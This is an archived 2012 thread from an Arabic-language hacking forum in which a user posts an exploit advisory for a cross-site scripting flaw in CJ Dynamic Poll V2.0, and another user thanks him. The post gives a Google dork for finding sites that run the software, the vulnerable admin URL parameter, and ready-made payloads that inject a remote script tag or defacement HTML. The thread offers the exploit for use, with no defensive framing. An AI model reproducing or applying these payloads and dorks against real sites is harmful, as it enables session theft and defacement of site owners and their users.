:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)
-   -   CJ Dynamic Poll V2.0 <= XSS Vulnerability (http://www.vbspiders.com/vb/t61858.html)

Dr.NaNo 04-13-2012 06:51 AM
CJ Dynamic Poll V2.0 <= XSS Vulnerability
 
بسم الله الرحمن الرحيم.
السلام عليكم ورحمه الله وبركاته.





كود:
# Exploit Title: CJ Dynamic Poll V2.0 <= XSS Vulnerability
# Author: Dr.NaNo
# Software Link: http://www.cj-design.com/products/free-downloads/php-scripts/cjdynamicpoll
# Version: 2.0
# Tested on: Linux-Red-Hat
# Google Dork: powered By CJ Dynamic Poll V2.0
#
########################################################
#                      ~ P0c~                        #
########################################################
 

 |+| Cross Site Scripting :

http://localhost/{PaTh}/admin/admin_index.php?action=reset_poll_ip&pollid={XSS}

    ~ For Example ~

http://localhost/{PaTh}/admin/admin_index.php?action=reset_poll_ip&pollid=<SCRIPT SRC=http://localhost/XSS.js></SCRIPT>

http://localhost/{PaTh}/admin/admin_index.php?action=reset_poll_ip&pollid=<center><h1>Dr.NaNo</H1> <DIV style="DISPLAY: none"><****area>



#### ~ Greetz ~ #########################################################
#                                                                      #
# Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020  #
#                                                                      #
# JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng    #
#                                                                      #
############################################### ~ All FriendS ~ #########

.More

dz.29 04-13-2012 11:53 AM
رد: CJ Dynamic Poll V2.0 <= XSS Vulnerability
 
شكرا لك اخي دكتور بارك الله فيك على الثغرة


الساعة الآن 07:19 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0